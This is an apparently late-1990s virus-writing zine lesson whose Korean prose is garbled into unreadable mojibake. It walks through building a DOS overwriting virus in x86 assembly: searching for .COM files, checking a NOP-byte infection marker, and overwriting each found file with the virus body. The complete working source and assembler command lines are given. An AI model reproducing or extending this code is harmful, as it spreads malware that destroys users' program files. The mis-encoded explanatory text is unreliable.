
                                                                 CVL #03, 98/03

-----------------------------------------------------------------> G-kill / CVC

               [[[ 蟾爾濠蒂 嬪и 夥檜楝蝶 薯濛 鬼謝 2 ]]]
  
                       ---------------------------
                         褒        瞪         ら
                       ---------------------------
  
                         蛔 煙 橾 : 1997. 08. 27
  
  
  Guru Killer 殮棲棻.
  
   雖陪 鬼謝縑憮朝 晦獄檜 腎朝 埤問虜 瞼疑歷轄. 斜 夥檜楝蝶蒂 橾欽 闡だ橾п
  憮 罹楝 寥褐戲煎 匐儀п爾賊 и措骯曖 唳辦 匐儀腎雖 彊堅, 諼措骯 寥褐曖 唳
  辦 TBAV曖 heuristic擊 檜辨ц擊 陽 Trivial {1} virus塭堅 釭褫棲棻. ж雖虜, 
  斜勒 餌檜鍔陛 濛擎 除欽и 夥檜楝蝶縑 渠п TBAV縑憮 頂場朝 詭撮雖橾閨,Tri-
  vial(嶸纂и)檜塭朝 夥檜楝蝶陛 氈朝 匙檜 嬴椎棲棻.
  
<< Osiris 輿 : Trivial 夥檜楝蝶朝 襄營м棲棻. 濛擎 觼晦曖 綠鼻輿啜藥噙晦 夥檜
               楝蝶菟擊 賅舒 Trivial virus 煎 蘆м棲棻. >>

   爾鱔擎 餌檜鍔縑 評塭 Trivial.(size) 夥檜楝蝶塭堅 蜓ж朝等, 雖陪廓 鬼謝縑
  釭螞  夥檜楝蝶曖  唳辦 50byte 嘐虜檜歷晦 陽僥縑 Trivial {1} 檜塭堅 釭螃啪 
  腎朝 匙殮棲棻.
  
   斜歲 檜溢啪 V3釭 Turbo Vaccine 偽擎 嶸纂и 寥褐擊 Яц棻堅 п憮 棻脹匙橾
  梱蹂?  橾欽  辦葬陛 膩舒縑 萃匙擎 V3偽擎 и措骯 寥褐菟擎 瞪睡 檜嘐 嫦唯脹 
  夥檜楝蝶虜  匐儀и棻朝 匙殮棲棻. 評塭憮 啗樓 虜菟棻 爾賊 替郭衛啊雖虜, 濠
  褐檜 億煎 虜萇 夥檜楝蝶朝 賅舒 V3盟曖 и措骯 寥褐縑 匐儀腎雖 彊蝗棲棻. 檜
  歇  唳辦 濠虜縑 緒雖啪 腎堅, 檜楛 濠虜戲煎 檣п 褕陝и 幗斜陛 斜渠煎 陴嬴
  氈朝 匙紫 賅艇羹 濠褐曖 夥檜楝蝶 虜萄朝 褒溘擊 婁衛ж啪 腌棲棻.
  
  檜楛 蜓擊 貲褕ж撮蹂! 濠棻梟紫 夥檜楝蝶 褻褕~! 謠擎 夥檜楝蝶紫 棻衛 爾濠!
  檜薯 辦葬朝 夥檜楝蝶曖 幗斜縑 渠п憮 號擎 儅陝擊 п撿й в蹂陛 氈蝗棲棻.
  
    辦摹 雖陪廓 夥檜楝蝶曖 唳辦, 檜嘐 馬膩腎橫 氈朝 匙紫 賅艇羹 傳 馬膩衛酈
  朝  橾檜 橾橫釭啪 腌棲棻. 爾鱔 int 21h曖 service 4eh蒂 檜辨ж罹 倣狨 瓊
  擊陽朝  蛤蝶觼縑憮 綠掖瞳 擅縑 氈朝 倣狨 瓊啪 腌棲棻. 評塭憮 DTA 艙羲縑 
  釭螃朝勒 衙廓 偽擎 倣狨 捕檜 堪蝗棲棻. (п渡 蛤滓攪葬曖 倣炵 餌檜縑
  贖  滲翕檜 橈棻賊...) 評塭憮 и偃曖 倣狨 啗樓 馬膩腆 捕紫 堪擎纔 檜楝
  賊  營嘐陛 橈啊轄. 渦遵檜 啜藥噙晦 夥檜楝蝶陛 嬴棋 晦儅⑽ 夥檜楝蝶曖 唳辦
  塭賊 倣牰蝩攽謚 啗樓 隸陛ж啪 腎橫, 旎寞 餌辨濠縑 曖п 嫦唯腎啪 腌棲棻.
  
  檜楛 僥薯蒂 Яж晦 嬪п 馬膩腎橫 氈朝雖蒂 羹觼ж朝 睡碟擊 蹺陛п獐梱蹂?
  蹺陛ж紫煙 п瑣衛棻. 檜啪 螃棺 鬼謝曖 纔葆陛 腆纔棲梱蹂. :)
  
  斜歲  橾欽 霜蕾 囀萄蒂 瞼晦瞪縑 橾欽擎 Щ煎斜極曖 瞪羹瞳檣 掘褻蒂 嘐葬 儅
  陝п獐 в蹂陛 氈蝗棲棻. 辦摹 雖陪廓 夥檜楝蝶曖 掘褻蒂 髦よ爾晦煎 ж轄.
  
    - COM⑽ 倣狨 瓊朝棻.
    - 瓊擎 倣狨 螃Ъи棻.
    - 倣狨 馬膩衛鑑棻.
    - 倣狨 殘朝棻.
    - Щ煎斜極 謙猿
  
  橫替 睡碟縑 馬膩 羹觼 瑞ず擊 餵橫厥橫撿 謠擊梱蹂? 倣狨 馬膩衛酈晦瞪檜塭
  賊 橫替 睡碟縑 厥橫紫 謠雖虜,  盪偽擎 唳辦朝 橾欽 瓊擎 倣狨 螃Ъж濠 葆
  濠 馬膩罹睡蒂 匐餌м棲棻.  夥檜楝蝶曖 瞪羹瞳  褒ч 衛除檜 穠嬴雖啪 腎剪萇
  蹂. 評塭憮 掘褻朝 棻擠婁 偽檜 腌棲棻.
  
    - COM⑽ 倣狨 瓊朝棻.
    - 瓊擎 倣狨 螃Ъи棻.
    - 馬膩罹睡蒂 羹觼и棻. <-- 檜睡碟檜 蹺陛腎歷擠
    - 倣狨 馬膩衛鑑棻.
    - 倣狨 殘朝棻.
    - Щ煎斜極 謙猿
  
   馬膩 罹睡蒂 羹おж溥賊 夥檜楝蝶縑 斜 夥檜楝蝶虜曖 絮かи か癒瞳檣 睡碟檜 
  氈橫撿 啊轄?! 檜楛勘 爾鱔擎 雖僥檜塭堅 м棲棻.
  
   闡だ橾脹 夥檜楝蝶曖 か薑 睡嬪縑憮  橾薑 囀萄蒂 瓊嬴 雖僥戲煎 鳴嬴紫 腎雖
  虜 斜歇 唳辦 釭醞縑 懍飛 ж賊 雖僥檜 餌塭雖啪 腎嘎煎 橾欽擎 辦葬陛 橾
  睡楝 雖僥擊 虜菟橫 厥橫爾煙 ж雖蹂. 
  
  罹晦憮朝 爾鱔 棻艇 諼措 斜瑜檜釭 и措 斜瑜菟檜 撲貲й 陽 ら曖鼻 濠輿 餌辨
  ж朝 NOP囀萄(90h)蒂 餌辨ж紫煙 ж啊蝗棲棻. 
  
  倣狨 籀擠睡碟縑憮 NOP蒂 瓊嬴憮 嫦唯腎賊, 檜嘐 馬膩腎歷戲嘎煎 馬膩衛酈雖 
  彊擎 匙殮棲棻.
  
  斜歲 檜薯 雖陪廓曖 囀萄蒂 髦よ 獐梱蹂?
  
  式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式剖
    1: .MODEL tiny
    2: .CODE
    3: org 100h
    4:
    5: Begin   proc    near
    6:
    7: ; COM⑽ 倣狨 瓊朝棻.
    8: FindFirst:
    9:    mov ah, 4eh
   10:    mov cx, 7       ; 樓撩 - 賅萇 樓撩
   11:    mov dx, offset Com_Mask
   12:    int 21h
   13:    jc  Exit        ; 縑楝陛 儅晦賊 謙猿ж朝 睡碟戲煎
   14:
   15: ; 瓊擎 倣狨 螃Ъи棻.
   16: FileOpen:
   17:    mov ax, 3d02h   ; 倣 螃Ъ 檗堅/噙晦
   18:    mov dx, 9eh     ; DTA曖 倣牉 睡碟(DTA=80h+filename嬪纂 1eh)
   19:    int 21h
   20:    xchg bx, ax     ; 倣 с菟擊 盪濰
   21:
   22: ; 倣狨 馬膩衛鑑棻.
   23: InfectCOM:
   24:    mov ax, 4200h   ; 倣狨 籀擠戲煎 檜翕
   25:    xor cx, cx
   26:    cwd
   27:    int 21h
   28:
   29:    mov ah, 40h     ; 倣狤 噙晦
   30:    mov cx, offset Last-offset Begin    ; 夥檜楝蝶曖 觼晦
   31:    mov dx, offset Begin                ; 夥檜楝蝶曖 籀擠睡碟睡攪
   32:    int 21h
   33:
   34: ; 倣狨 殘朝棻.
   35: Close:
   36:    mov ah, 3eh     ; 倣狨 殘朝棻.
   37:    int 21h
   38:
   39: ; Щ煎斜極 謙猿.
   40: Exit:
   41:    mov ax, 4c00h   ; Щ煎斜極 謙猿
   42:    int 21h
   43:
   44: Com_Mask  DB    '*.com',0   ; 錳ж朝 ASCIIZ倣牉
   45:
   46: Last    label near          ; 夥檜楝蝶曖 部擊 陛葬酈朝 溯檜綰
   47:
   48: Begin   endp
   49:         end Begin
  式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式剖
  
   罹晦憮 倣狨 籀擠 睡碟(6ч 檜)縑 NOP(90h) 蒂 餵橫 厥蝗棲棻. 斜葬堅 瓊
  擎 倣狨 螃Ъж朝 睡碟 夥煎 菴縑憮 馬膩 罹睡蒂 羹觼ж紫煙 ж朝 匙殮棲棻.
  
  式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式剖
  
       ...   儅楞  ...
    5: Begin   proc    near
  
    6:    jmp short FindFirst  ; NOP睡碟擊 勒傘嗨晦嬪п
          nop  ; 傳朝 DB 90h, 90h,90h 塭堅 餵橫厥橫紫 腌棲棻.
          nop  ; NOP 貲滄橫曖 16霞熱高檜 90h檜晦 陽僥檣剪 棻嬴衛轄?
  
    7: ; COM⑽ 倣狨 瓊朝棻.
    8: FindFirst:
    9:    mov ah, 4eh
   10:    mov cx, 7       ; 樓撩 - 賅萇 樓撩
   11:    mov dx, offset Com_Mask
   12:    int 21h
   13:    jc  Exit        ; 縑楝陛 儅晦賊 謙猿ж朝 睡碟戲煎
  
       ...   儅楞  ...
  
   15: ; 瓊擎 倣狨 螃Ъи棻.
   16: FileOpen:
   17:    mov ax, 3d02h   ; 倣 螃Ъ 檗堅/噙晦
   18:    mov dx, 9eh     ; DTA曖 倣牉 睡碟(DTA=80h+filename嬪纂 1eh)
   19:    int 21h
   20:    xchg bx, ax     ; 倣 с菟擊 盪濰
  
   21: ; 馬膩 罹睡蒂 羹觼ж晦 嬪п 倣狨 檗橫菟檣棻.
       ReadFile:
          mov ah, 3fh     ; 倣狨 檗朝棻.
          mov cx, 4       ; 籀擠睡攪 4夥檜お
          mov dx, offset buffer  ; 檗橫菟橾 幗ぷ 撲薑
          int 21h
       Check:
          cmp word ptr [buffer+3], 9090h ; 檜嘐 馬膩腎歷朝雖 綠掖
          jnz InfectCOM   ; 馬膩腎雖 彊懊戲賊 馬膩
          jmp Close       ; 檜嘐 馬膩腎歷戲賊 倣狨 殘堅 謙猿
  
   22: ; 倣狨 馬膩衛鑑棻.
   23: InfectCOM:
   24:    mov ax, 4200h               ; 倣狨 籀擠戲煎 檜翕
   25:    xor cx, cx
   26:    cwd
   27:    int 21h
   28:
       ...   儅楞  ...
  
  式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式剖
  
   虜褶蝶毀雖朝 彊雖虜 橾欽 除欽ж啪朝 腎歷蝗棲棻. 錳楚 檜嘐 馬膩腎歷戲賊 
  棻艇 倣狨 瓊紫煙 夥脯撿 ж朝等蹂. 斜 睡碟擊 夥紱晦煎 п爾轄.
  
  式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式剖
  
       ...   儅楞  ...
      Check:
          cmp word ptr [Buffer+2], 9090h ; 檜嘐 馬膩腎歷朝雖 綠掖
          jz  FindNext    ; 檜嘐 馬膩腎歷戲賊 棻艇 倣狨 瓊朝棻.
  
       ...   儅楞  ...
  
      FindNext:
          mov ah, 4fh     ; 橾纂ж朝 棻擠倣 瓊晦
          jmp short Find  ; 倣 瓊朝 睡碟戲煎 碟晦
       ...   儅楞  ...
  
      Buffer          DB 4 dup (0)    ; 倣狨 檜嘐 馬膩腎歷朝雖 憲晦嬪п
                                      ; 倣狨 檗橫菟橾陽 噙檜朝 幗ぷ
  
  式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式剖
  
   檜薯 嬪曖 寞徹縑 評塭 錳楚曖 模蝶蒂 滲⑽п 爾紫煙 ж啊蝗棲棻. 
  
  式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式剖
  
   .MODEL tiny
   .CODE
   org 100h
  
   Begin   proc    near
      jmp short FindFirst  ; NOP睡碟擊 勒傘嗨晦嬪п
      nop                  ; 夥檜楝蝶曖 雖僥
      nop
  
  ; COM⑽ 倣狨 瓊朝棻.
   FindFirst:
      mov ah, 4eh
   Find:
      mov cx, 7            ; 樓撩 - 賅萇 樓撩
      mov dx, offset Com_Mask
      int 21h
      jc  Exit             ; 縑楝陛 儅晦賊 謙猿ж朝 睡碟戲煎
  
   ; 瓊擎 倣狨 螃Ъи棻.
   FileOpen:
      mov ax, 3d02h        ; 倣 螃Ъ 檗堅/噙晦
      mov dx, 9eh          ; DTA曖 倣牉 睡碟(DTA=80h+filename嬪纂 1eh)
      int 21h
      xchg bx, ax          ; 倣 с菟擊 盪濰
  
   ; 馬膩 罹睡蒂 羹觼ж晦 嬪п 倣狨 檗橫菟檣棻.
   ReadFile:
      mov ah, 3fh          ; 倣狨 檗朝棻.
      mov cx, 4            ; 籀擠睡攪 4夥檜お
      mov dx, offset buffer  ; 檗橫菟橾 幗ぷ 撲薑
      int 21h
   Check:
      cmp word ptr [Buffer+2], 9090h ; 檜嘐 馬膩腎歷朝雖 綠掖
      jz  FindNext    ; 檜嘐 馬膩腎歷戲賊 棻艇 倣狨 瓊朝棻.
                      ; 馬膩腎雖 彊懊戲賊 馬膩衛鑑棻.
  
   ; 倣狨 馬膩衛鑑棻.
   InfectCOM:
      mov ax, 4200h        ; 倣狨 籀擠戲煎 檜翕
      xor cx, cx
      cwd
      int 21h
  
      mov ah, 40h          ; 倣狤 噙晦
      mov cx, offset Last-offset Begin    ; 夥檜楝蝶曖 觼晦
      mov dx, offset Begin ; 夥檜楝蝶曖 籀擠睡碟睡攪
      int 21h
  
   ; 倣狨 殘朝棻.
   Close:
      mov ah, 3eh          ; 倣狨 殘朝棻.
      int 21h
  
   ; Щ煎斜極 謙猿.
   Exit:
      mov ax, 4c00h        ; Щ煎斜極 謙猿
      int 21h
  
   FindNext:
      mov ah, 4fh          ; 橾纂ж朝 棻擠倣 瓊晦
      jmp short Find       ; 倣 瓊朝 睡碟戲煎 碟晦
  
   Buffer    DB 4 dup (0)      ; 倣狨 檜嘐 馬膩腎歷朝雖 憲晦嬪п
                               ; 倣狨 檗橫菟橾陽 噙檜朝 幗ぷ
   Com_Mask  DB    '*.com',0   ; 錳ж朝 ASCIIZ倣牉
  
   Last    label near          ; 夥檜楝蝶曖 部擊 陛葬酈朝 溯檜綰
  
   Begin   endp
           end Begin
  式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式式剖
  
   檜薯 覬 腎歷捱蹂. ж雖虜 嬴霜紫 夥檜楝蝶塭堅 ж晦縛 睡褶и 薄檜 號蝗棲棻
  薯渠煎 髦嬴陴晦 嬪п憮朝 嬴霜紫 乾醮撿й 晦棟檜 傘鼠釭 號雖蹂.  ж雖虜 傘
  鼠 號擎 匙擊 и廓縑 憲溥萄葬賊 評塭螃晦 萄褒纔棲 螃棺擎 檜鎢縑憮 部頂紫
  煙 ж啊蝗棲棻. 
  
  Ⅰ 霤堅
  
    嬪曖 囀萄朝 MASM 5.1 檜ж縑憮朝 縑楝陛 陶棲棻. MASM曖 幗斜塭堅 儅陝腎朝
   等, Check 瑞ず縑憮 Buffer 睡碟擊 霤褻й 陽 瞪寞 霤褻陛 橾橫釭堅 釭憮  菴
   縑 薄Щ 睡碟檜 釭螃朝等蹂. MASM朝 2ぬ蝶 橫撬綰楝檜晦 陽僥縑 檜 僥薯蒂 澀
   剩啖撿 м棲棻. 檜煩瞳戲煎朝 斜歲縑紫, 碳ч鰽 1ぬ蝶蒂 ж堅 釭憮 2ぬ蝶縑 
   菟橫憮憮朝 Buffer 睡碟曖 輿模蒂 檠橫幗董棲棻. 嬴葆 MASM 虜檜 陛霞 闡だ橾 
   寞衝曖 綠塵縑 п港檜 氈啊轄?~! 
  
    評塭憮 TASM戲煎 闡だ橾 ж衛賊 腆剪塭朝 蜓噪殮棲棻.
   褫暮擎 "TASM /M /Q [filename]"ж衛賊 腌棲棻. MASM 6.11縑憮朝 檜溢啪 褫暮
   擊 檜溢啪 輿敷撿 м棲棻. "ml /I. /c /Ta [filename]" 檜溢啪 ц渦棲 橫撬綰
   檜 撩奢ж渦捱蹂.
  
                                                      [ Guru Killer ]
  
